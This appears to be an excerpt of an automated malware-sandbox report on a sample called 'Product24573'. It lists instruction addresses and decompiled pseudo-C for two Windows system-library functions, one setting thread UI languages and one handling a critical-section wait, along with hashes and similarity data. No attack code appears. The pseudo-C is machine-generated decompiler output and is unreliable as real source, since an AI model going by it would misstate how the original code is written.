                                          0x01122990
                                          0x01122992
                                          0x01122997
                                          0x011229a3
                                          0x011229a6
                                          0x011229ab
                                          0x011229ad
                                          0x011229b0
                                          0x011229b2
                                          0x01165c80
                                          0x011229b8
                                          0x011229b8
                                          0x011229bb
                                          0x011229c0
                                          0x011229c5
                                          0x011229c6
                                          0x011229c6
                                          0x011229c9
                                          0x011229cb
                                          0x00000000
                                          0x00000000
                                          0x011229cd
                                          0x011229d0
                                          0x011229d9
                                          0x011229db
                                          0x011229dd
                                          0x01122a7f
                                          0x01122a84
                                          0x01122a87
                                          0x01122a89
                                          0x01165ca1
                                          0x01165ca3
                                          0x00000000
                                          0x01122a8f
                                          0x01122a8f
                                          0x00000000
                                          0x01122a8f
                                          0x00000000
                                          0x011229e3
                                          0x011229e3
                                          0x011229e3
                                          0x00000000
                                          0x011229e3
                                          0x011229dd
                                          0x00000000
                                          0x011229db
                                          0x011229e6
                                          0x011229e9
                                          0x011229eb
                                          0x011229ed
                                          0x011229f3
                                          0x011229f5
                                          0x011229f8
                                          0x011229fa
                                          0x01122a97
                                          0x01122a9a
                                          0x01122a9d
                                          0x01122add
                                          0x00000000
                                          0x01122a9f
                                          0x01122aa2
                                          0x01122aa5
                                          0x01122aa8
                                          0x01122aab
                                          0x01165cab
                                          0x01165caf
                                          0x01165cc5
                                          0x01165cda
                                          0x01165cdc
                                          0x01165cdf
                                          0x01165ce5
                                          0x00000000
                                          0x01165ceb
                                          0x01165ced
                                          0x01165cee
                                          0x00000000
                                          0x01165cee
                                          0x01165cb1
                                          0x01165cb4
                                          0x01165cb9
                                          0x01165cbb
                                          0x00000000
                                          0x01165cbd
                                          0x01165cbd
                                          0x00000000
                                          0x01165cbd
                                          0x01165cbb
                                          0x01122ab1
                                          0x01122ab1
                                          0x01122ac4
                                          0x01122ac6
                                          0x01122ac6
                                          0x00000000
                                          0x01122ac6
                                          0x01122aab
                                          0x00000000
                                          0x01122a00
                                          0x01122a09
                                          0x01122a0e
                                          0x01122a21
                                          0x01122a24
                                          0x01122a35
                                          0x01122a3a
                                          0x01122a3d
                                          0x01122a42
                                          0x01122a59
                                          0x01122a59
                                          0x01122a5c
                                          0x01122a5f
                                          0x01122a5f
                                          0x011229fa
                                          0x011229f3
                                          0x01122a64
                                          0x01122a64
                                          0x01122a6b
                                          0x01122a6b
                                          0x01122a6d
                                          0x01122a72
                                          0x01122a72
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PATH
                                          • API String ID: 0-1036084923
                                          • Opcode ID: 887ecb963f124f63760961d8c374345c63ad0525c41dd9ac893f57e681a9cf71
                                          • Instruction ID: 517b9af72e786b65d87fe409c1b8244c881ed531ff0ace3938664a9c2d0799cd
                                          • Opcode Fuzzy Hash: 887ecb963f124f63760961d8c374345c63ad0525c41dd9ac893f57e681a9cf71
                                          • Instruction Fuzzy Hash: 3BC1B072E04629DBDB2DDF98D880BADBBF5FF58740F094029E901BB250E774A851CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0112FAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 80%
                                          			E0112FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0110EEF0(0x11e7b60);
					_t134 =  *0x11e7b84; // 0x77997b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x11e7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x11e7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E01106D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E011076E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01198938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E010FB150();
													}
													_t116 = E01196D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E011075CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x11e8638; // 0x0
																	_t122 = L011038A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E011076E2(_t154);
																			goto L41;
																		}
																	} else {
																		E011076E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0112FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L011070F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0112FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0112FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0112FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0112FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0112FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x11e7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x11e7b84 = _t75;
						_t73 = E0110EB70(_t134, 0x11e7b60);
						if( *0x11e7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0110FF60( *0x11e7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                          0x0112fab0
                                          0x0112fab2
                                          0x0112fab3
                                          0x0112fab4
                                          0x0112fabc
                                          0x0112fac0
                                          0x0112fb14
                                          0x0112fb17
                                          0x0112fac2
                                          0x0112fac8
                                          0x0112facd
                                          0x0112fad3
                                          0x0112fad3
                                          0x0112fadd
                                          0x0112fb18
                                          0x0112fb1b
                                          0x0112fb1d
                                          0x0112fb1e
                                          0x0112fb1f
                                          0x0112fb20
                                          0x0112fb21
                                          0x0112fb22
                                          0x0112fb23
                                          0x0112fb24
                                          0x0112fb25
                                          0x0112fb26
                                          0x0112fb27
                                          0x0112fb28
                                          0x0112fb29
                                          0x0112fb2a
                                          0x0112fb2b
                                          0x0112fb2c
                                          0x0112fb2d
                                          0x0112fb2e
                                          0x0112fb2f
                                          0x0112fb3a
                                          0x0112fb3b
                                          0x0112fb3e
                                          0x0112fb41
                                          0x0112fb44
                                          0x0112fb47
                                          0x0112fb4a
                                          0x0112fb4d
                                          0x0112fb53
                                          0x0116bdcb
                                          0x0116bdcb
                                          0x0112fb59
                                          0x0112fb5b
                                          0x0112fb5b
                                          0x0112fb5e
                                          0x0116bdd5
                                          0x0116bdd8
                                          0x00000000
                                          0x0116bdda
                                          0x00000000
                                          0x0116bdda
                                          0x0112fb64
                                          0x0112fb64
                                          0x0112fb64
                                          0x0112fb67
                                          0x0112fb6e
                                          0x0112fb70
                                          0x0112fb72
                                          0x00000000
                                          0x0112fb78
                                          0x0112fb7a
                                          0x0112fb7a
                                          0x0112fb7d
                                          0x0112fb80
                                          0x0116bddf
                                          0x0116bde1
                                          0x00000000
                                          0x0116bde3
                                          0x00000000
                                          0x0116bde3
                                          0x0112fb86
                                          0x0112fb86
                                          0x0112fb86
                                          0x0112fb8b
                                          0x0112fb90
                                          0x0112fb92
                                          0x0112fb94
                                          0x0112fb9a
                                          0x0112fb9b
                                          0x0112fba1
                                          0x0116bde8
                                          0x0116bdeb
                                          0x0116bded
                                          0x0116beb5
                                          0x0116beb5
                                          0x0116bebb
                                          0x0116bebd
                                          0x0116bec3
                                          0x0116bed2
                                          0x0116bedd
                                          0x0116bedd
                                          0x0116beed
                                          0x00000000
                                          0x0116bdf3
                                          0x0116bdfe
                                          0x0116be06
                                          0x0116be0b
                                          0x0116be0d
                                          0x0116be0f
                                          0x0116be14
                                          0x0116be19
                                          0x0116be20
                                          0x0116be25
                                          0x0116be27
                                          0x0116be35
                                          0x0116be39
                                          0x0116be46
                                          0x0116be4f
                                          0x0116be54
                                          0x0116be56
                                          0x0116bef8
                                          0x0116bef8
                                          0x00000000
                                          0x0116be5c
                                          0x0116be5c
                                          0x0116be60
                                          0x00000000
                                          0x0116be66
                                          0x0116be66
                                          0x0116be7f
                                          0x0116be84
                                          0x0116be87
                                          0x0116be89
                                          0x0116be8b
                                          0x0116be99
                                          0x0116be9d
                                          0x0116bea0
                                          0x0116beac
                                          0x0116beaf
                                          0x0116beb1
                                          0x0116beb3
                                          0x0116beb3
                                          0x00000000
                                          0x0116bea2
                                          0x0116bea2
                                          0x00000000
                                          0x0116bea2
                                          0x0116be8d
                                          0x0116be8d
                                          0x0116be92
                                          0x00000000
                                          0x0116be92
                                          0x0116be8b
                                          0x0116be60
                                          0x0116be3b
                                          0x0116be3b
                                          0x0116be3e
                                          0x00000000
                                          0x0116be40
                                          0x0116be40
                                          0x0116be44
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0116be44
                                          0x0116be3e
                                          0x0116be29
                                          0x0116be29
                                          0x00000000
                                          0x0116be29
                                          0x0116be27
                                          0x00000000
                                          0x0112fba7
                                          0x0112fba7
                                          0x0112fbab
                                          0x0116bf02
                                          0x0112fbb1
                                          0x0112fbb1
                                          0x0112fbb8
                                          0x0112fbbd
                                          0x0112fbbd
                                          0x0112fbbf
                                          0x0112fbbf
                                          0x0112fbc5
                                          0x0112fbcb
                                          0x0112fbf8
                                          0x0112fbf8
                                          0x0112fbfa
                                          0x00000000
                                          0x0112fc00
                                          0x0112fc00
                                          0x0112fc03
                                          0x00000000
                                          0x0112fc09
                                          0x0112fc09
                                          0x0112fc0f
                                          0x0112fc15
                                          0x0112fc23
                                          0x0112fc23
                                          0x0112fc25
                                          0x0112fc27
                                          0x0112fc75
                                          0x0112fc7c
                                          0x0112fc84
                                          0x00000000
                                          0x0112fc29
                                          0x0112fc29
                                          0x0112fc2d
                                          0x0112fc30
                                          0x0116bf0f
                                          0x00000000
                                          0x0112fc36
                                          0x0112fc38
                                          0x0112fc3b
                                          0x0112fc41
                                          0x0116bf17
                                          0x0116bf19
                                          0x0116bf48
                                          0x0116bf4b
                                          0x00000000
                                          0x0116bf1b
                                          0x0116bf22
                                          0x0116bf24
                                          0x0116bf26
                                          0x00000000
                                          0x0116bf2c
                                          0x0116bf37
                                          0x0116bf39
                                          0x0116bf3b
                                          0x00000000
                                          0x0116bf41
                                          0x0116bf41
                                          0x0116bf41
                                          0x0116bf41
                                          0x0116bf45
                                          0x00000000
                                          0x0116bf45
                                          0x0116bf3b
                                          0x0116bf26
                                          0x00000000
                                          0x0112fc47
                                          0x0112fc47
                                          0x0112fc49
                                          0x0112fcb2
                                          0x0112fcb4
                                          0x0112fcb6
                                          0x0112fcdc
                                          0x0112fcdc
                                          0x00000000
                                          0x0112fcb8
                                          0x0112fcc3
                                          0x0112fcc5
                                          0x0112fcc7
                                          0x00000000
                                          0x0112fcc9
                                          0x0112fcc9
                                          0x0112fccd
                                          0x00000000
                                          0x0112fccd
                                          0x0112fcc7
                                          0x00000000
                                          0x0112fc4b
                                          0x0112fc4b
                                          0x0112fc4e
                                          0x0112fc4e
                                          0x0112fc51
                                          0x0112fc51
                                          0x0112fc54
                                          0x0112fc5a
                                          0x0112fc5c
                                          0x0112fc5f
                                          0x0112fc61
                                          0x0112fc63
                                          0x0112fc65
                                          0x0112fc67
                                          0x0112fc6e
                                          0x0112fc72
                                          0x0112fc72
                                          0x0112fc72
                                          0x0112fc72
                                          0x0112fc67
                                          0x0112fc61
                                          0x00000000
                                          0x0112fc5a
                                          0x0112fc49
                                          0x0112fc41
                                          0x0112fc30
                                          0x0112fc27
                                          0x0112fc03
                                          0x0112fbcd
                                          0x0112fbd3
                                          0x0112fbd9
                                          0x0112fbdc
                                          0x0112fbde
                                          0x0112fc99
                                          0x0112fc9b
                                          0x0112fc9d
                                          0x0112fcd5
                                          0x0112fcd5
                                          0x0112fc89
                                          0x0112fc89
                                          0x00000000
                                          0x0112fc9f
                                          0x0112fc9f
                                          0x0112fca3
                                          0x00000000
                                          0x0112fca3
                                          0x00000000
                                          0x0112fbe4
                                          0x0112fbe4
                                          0x0112fbe4
                                          0x0112fbe4
                                          0x0112fbe9
                                          0x0112fbf2
                                          0x00000000
                                          0x0112fbf2
                                          0x0112fbde
                                          0x0112fbcb
                                          0x0112fbab
                                          0x0112fc8b
                                          0x0112fc8b
                                          0x0112fc8c
                                          0x0112fb80
                                          0x0112fb72
                                          0x0112fb5e
                                          0x0112fc8d
                                          0x0112fc91
                                          0x0112fadf
                                          0x0112fadf
                                          0x0112fae1
                                          0x0112fae4
                                          0x0112fae7
                                          0x0112faec
                                          0x0112faf8
                                          0x0112fb00
                                          0x0112fb07
                                          0x0112fb0f
                                          0x0112fb0f
                                          0x0112fb07
                                          0x00000000
                                          0x0112faf8
                                          0x0112fadd

                                          Strings
                                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0116BE0F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                          • API String ID: 0-865735534
                                          • Opcode ID: 4ec9b67f1a88876f3bf55da41c1dd95dee1b1ebfcacbf4a1d10f12271e434310
                                          • Instruction ID: 642253e484f5456b0c0f29318fd16b82f43824653b6d6ca767d5ed98b86c8f80
                                          • Opcode Fuzzy Hash: 4ec9b67f1a88876f3bf55da41c1dd95dee1b1ebfcacbf4a1d10f12271e434310
                                          • Instruction Fuzzy Hash: D5A10531B006278BEB2ECF68C850B7EB7B9AF44724F044569D946DB681DB31D862CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010F2D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 63%
                                          			E010F2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x11e5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x11e7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E011397C0();
				}
				if( *0x11e79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x11e79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01121624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01117D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0118FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01139520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0112E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0114DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x11e6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x11e6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01139980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E011395D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01117D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01117D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01177016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0118FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x11e5350;
							if(_t109 != 0x11e5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0118FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01185720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                          0x010f2d8a
                                          0x010f2d8a
                                          0x010f2d92
                                          0x010f2d96
                                          0x010f2d9e
                                          0x010f2da0
                                          0x010f2da3
                                          0x010f2da5
                                          0x010f2da8
                                          0x010f2dab
                                          0x010f2db2
                                          0x0114f9aa
                                          0x0114f9ab
                                          0x0114f9ae
                                          0x0114f9ae
                                          0x010f2db8
                                          0x010f2dc2
                                          0x0114f9b9
                                          0x0114f9be
                                          0x0114f9bf
                                          0x0114f9bf
                                          0x010f2dcf
                                          0x0114f9c9
                                          0x010f2dd5
                                          0x010f2dd5
                                          0x010f2dd5
                                          0x010f2dde
                                          0x010f2de1
                                          0x010f2e70
                                          0x010f2e72
                                          0x010f2e72
                                          0x010f2de7
                                          0x010f2deb
                                          0x010f2e7c
                                          0x010f2e83
                                          0x010f2e85
                                          0x010f2e8b
                                          0x010f2e8d
                                          0x010f2e92
                                          0x010f2e92
                                          0x010f2e85
                                          0x010f2df1
                                          0x010f2df7
                                          0x010f2df9
                                          0x010f2df9
                                          0x010f2dfc
                                          0x010f2dff
                                          0x010f2e02
                                          0x00000000
                                          0x010f2e05
                                          0x010f2e0c
                                          0x0114f9d9
                                          0x010f2e12
                                          0x010f2e12
                                          0x010f2e12
                                          0x010f2e1a
                                          0x0114f9e3
                                          0x0114f9e9
                                          0x0114f9f0
                                          0x0114f9f6
                                          0x0114f9f8
                                          0x0114f9f8
                                          0x0114f9f0
                                          0x010f2e23
                                          0x0114fa02
                                          0x0114fa03
                                          0x0114fa05
                                          0x0114fa06
                                          0x00000000
                                          0x010f2e29
                                          0x010f2e29
                                          0x010f2e2e
                                          0x010f2e34
                                          0x010f2e3e
                                          0x00000000
                                          0x00000000
                                          0x010f2e44
                                          0x010f2e47
                                          0x010f2e4d
                                          0x00000000
                                          0x00000000
                                          0x010f2e4f
                                          0x010f2e54
                                          0x00000000
                                          0x00000000
                                          0x010f2e5a
                                          0x010f2e5f
                                          0x010f2e9a
                                          0x010f2ea4
                                          0x010f2ea5
                                          0x010f2ea8
                                          0x010f2eaf
                                          0x010f2eb2
                                          0x010f2eb5
                                          0x0114fae9
                                          0x0114faeb
                                          0x0114faed
                                          0x0114faef
                                          0x0114faf7
                                          0x0114faf8
                                          0x0114fafd
                                          0x0114faff
                                          0x0114fb04
                                          0x0114fb04
                                          0x0114faff
                                          0x010f2ec0
                                          0x010f2ec4
                                          0x010f2ec6
                                          0x010f2ec8
                                          0x0114fb14
                                          0x0114fb18
                                          0x0114fb1e
                                          0x0114fb21
                                          0x0114fb21
                                          0x010f2ece
                                          0x010f2ece
                                          0x010f2ece
                                          0x010f2ed7
                                          0x010f2e61
                                          0x010f2e63
                                          0x0114fa6b
                                          0x0114fa71
                                          0x0114fa76
                                          0x0114fa78
                                          0x0114fa8a
                                          0x0114fa7a
                                          0x0114fa83
                                          0x0114fa83
                                          0x0114fa8f
                                          0x0114fa91
                                          0x0114fa97
                                          0x0114fa9d
                                          0x0114faa4
                                          0x0114faaa
                                          0x0114faaf
                                          0x0114fab1
                                          0x0114fac3
                                          0x0114fab3
                                          0x0114fabc
                                          0x0114fabc
                                          0x0114fac8
                                          0x0114facb
                                          0x0114fadf
                                          0x0114fadf
